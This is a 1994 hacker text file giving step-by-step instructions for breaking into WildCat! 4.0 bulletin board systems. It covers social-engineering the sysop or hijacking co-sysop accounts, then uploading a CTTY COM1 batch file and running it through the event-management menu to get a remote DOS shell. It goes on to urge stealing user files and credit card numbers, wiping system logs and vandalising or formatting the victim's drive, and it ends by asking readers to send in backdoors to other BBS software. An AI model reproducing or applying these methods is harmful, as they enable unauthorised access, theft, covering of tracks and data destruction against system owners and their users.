148 lines
6.5 KiB
Plaintext
148 lines
6.5 KiB
Plaintext
|
|
How to hack WildCat! 4.0
|
|
One Hacker's experience....
|
|
by
|
|
RoBoTiC HaMSTeR
|
|
|
|
|
|
Well, first off, I have some good news, and some bad news... The
|
|
good news is that, yes, WildCat! is hackable. The bad news is that
|
|
with method explained here, you need to be able to access the sysop menu.
|
|
Now before you walk off and think it's impossible, it's not...
|
|
I've been able to do it more then once... The key is to act like the
|
|
sysop's best buddy... WITHOUT bugging and annoying him. Try checking the
|
|
message bases and reply to any messages left by him. Try to chat with him
|
|
once in a while... Try talking about the latest software... Trade programs...
|
|
Be creative! After he thinks he knows you pretty well, ask for co-sysop
|
|
access... (Only say it in a more joking manner. Like you're really not
|
|
expecting him to say yes.)
|
|
Another way is to hack someone's account who has sysop or co-sysop
|
|
access. I've found many boards with many users having co-sysop access...
|
|
Hack away!
|
|
|
|
|
|
Once you're in:
|
|
---------------
|
|
Okay, you have co-sysop access. To be able to drop to DOS, you
|
|
will need a batch file which contains the following:
|
|
|
|
CTTY COM1
|
|
COMMAND
|
|
|
|
(And, of course, COM1 is replaced with the appropriate com port.) Call
|
|
the file whatever you want... "BATCH.BAT", "TAKETHIS.SOB", anything your
|
|
heart desires. Okay, now upload the file. Then go to the sysop menu
|
|
by typing "1" at the menu prompt. Once there, run the "Even management"
|
|
option. You should see something like the following:
|
|
|
|
# Description Schedule Type Start Last Execute Parameters
|
|
--- ------------- -------- ---- ------- -------------------- ----------
|
|
1 Run batch SMTWTFS Soft 12:00am Wed 10/12/94 12:00am WET.BAT
|
|
* 2 Run batch SMTWTFS Hard 2:00am Fri 10/28/94 2:00am MAILRUN.BAT
|
|
3 Run batch SMTWTFS Hard 3:00am Sat 08/27/94 10:07am TERM.BAT
|
|
4 Run batch SMTWTFS Soft 4:00pm Wed 10/12/94 4:00pm WET1.BAT
|
|
* 5 Reset stats SMTWTFS Soft 4:00pm Thu 10/27/94 4:07pm
|
|
6 Run batch SMTWTFS Soft 9:00pm Wed 10/12/94 9:00pm WET.BAT
|
|
Current time: Fri 10/28/94 12:23pm
|
|
Edit [A]dd, [E]dit, [R]un, [D]elete, [S]chedule, [H]elp, [Q]uit? [ ]
|
|
|
|
(NOTE: the above is an excerpt from a capture file on a hack I recently
|
|
did.) First find out what directory the files for WildCat! are located
|
|
by hitting "E" to edit an event. Take your pick which one you edit...
|
|
You'll see something like the following:
|
|
|
|
[E]nabled : No
|
|
[A]ction : Run batch
|
|
[B]atch file : C:\WC30\TERM.BAT
|
|
S[h]ell type : Terminate
|
|
[T]ype : Hard
|
|
T[i]me : 03:00
|
|
S[c]hedule : Daily
|
|
[D]ay : Sun Mon Tue Wed Thu Fri Sat
|
|
[L]ast executed : 08/27/94 10:07
|
|
|
|
Edit event [S]ave, [Q]uit? [Q]
|
|
|
|
Bingo! The files on this system are located in the directory
|
|
C:\WC30. Now go and create a new event by hitting "A" at the event
|
|
management menu. When it asks for the directory that the batch file
|
|
is located, enter the upload directory. We know that the BBS files are
|
|
kept in the C:\WC30 directory so try C:\WC30\NEW or C:\WC30\UPLOADS.
|
|
(Which is where I found them in this case.) Something that helps sometimes
|
|
is the name of the file directory on the board. If it's called "New files"
|
|
try \WC30\NEW. If it says "Recent uploads" try \WC30\UPLOADS. You get the
|
|
idea. Now, at the even mangament menu, [R]un the event you just created.
|
|
You'll know if you entered a nonexistent directory if you get the message:
|
|
|
|
System Error:
|
|
Sysop has been notified, you may continue...
|
|
|
|
And then it drops back to the event management menu. One note
|
|
here, if you entered the wrong com port in your batch file and try to
|
|
run the batch file, the BBS will lock up until the sysop reboots the BBS.
|
|
After lots of personal experience, I've found this method a lot
|
|
easier then trying to hack out the password with the Shell to DOS
|
|
option.(Which you must have sysop access to the best of my knowledge)
|
|
You may prefer to try using that tho... It's up to you.
|
|
|
|
|
|
What to do once you're in:
|
|
--------------------------
|
|
Whenever I hack a board, I always make sure there's a copy of
|
|
DSZ online and if there's not I upload it. Other programs that will
|
|
help are files like File Find(to find certain programs) and Wipe(to
|
|
erase your working files, system logs, etc.).
|
|
Okay, things to look for are the sysop's terminal program. Zip
|
|
and download it. Zip the BBS software and download that too! (You may
|
|
not want to go this route tho since WildCat! 4.0 is several megs. <g>
|
|
Try just taking the user file.)
|
|
Try finance programs like Quicken... There may be credit card
|
|
numbers and the like in the program. Use you imagination!
|
|
Don't format the drive tho unless the guy's a REAL prick...
|
|
Personally, I just like to leave little messages and stuff behind...
|
|
make the guy know his system is not as secure as he thought. Rename
|
|
his hard dive. Edit his autoexec.bat to display a cute little message.
|
|
Let him live in fear with the fact that people can hack into his system.
|
|
:-)
|
|
|
|
|
|
A word in closing:
|
|
------------------
|
|
Well, that basically covers everything I was going to talk about
|
|
in this file. If there are any questions, I can be contacted on RIPCO,
|
|
PMS, or The Death Legion. The numbers for which are all listed at the
|
|
end of the file.
|
|
Also, any feed back would be greatly apperciated. This is the
|
|
first time I've ever written a file on hacking and would like to know
|
|
what you think. Positive, or negative... All feedback is welcome. After
|
|
seeing some of the trash on boards like RIPCO, it my intent to write
|
|
QUALITY text files... Ones you can accually understand. Hey, thanks for
|
|
reading...
|
|
|
|
|
|
Help!!!! Help!!!!
|
|
-----------------
|
|
I now have a small request of you, the reader... If you know
|
|
of ANY backdoors to ANY BBS programs, PLEASE let me know. In return for
|
|
any valid backdoors you tell me about, I'll share with you a way to
|
|
hack ViSiON-X /2 (and without having to have co-sysop access!). You
|
|
scratch my back, and I'll scratch yours.
|
|
|
|
|
|
L8r.
|
|
RoBoTiC HaMSTeR (October 1994)
|
|
|
|
|
|
Report all backdoors to me at the following boards:
|
|
RIPCO BBS 1.312.528.5020
|
|
PMS 1.908.793.7060
|
|
Death Legion 1.315.472.XXXX
|
|
|
|
|
|
|
|
|
|
1994 Psychadelic Technologies of America Incorporated
|
|
Specializing in computer hacking, computer virii, telecommunications,
|
|
and quality text files.
|
|
|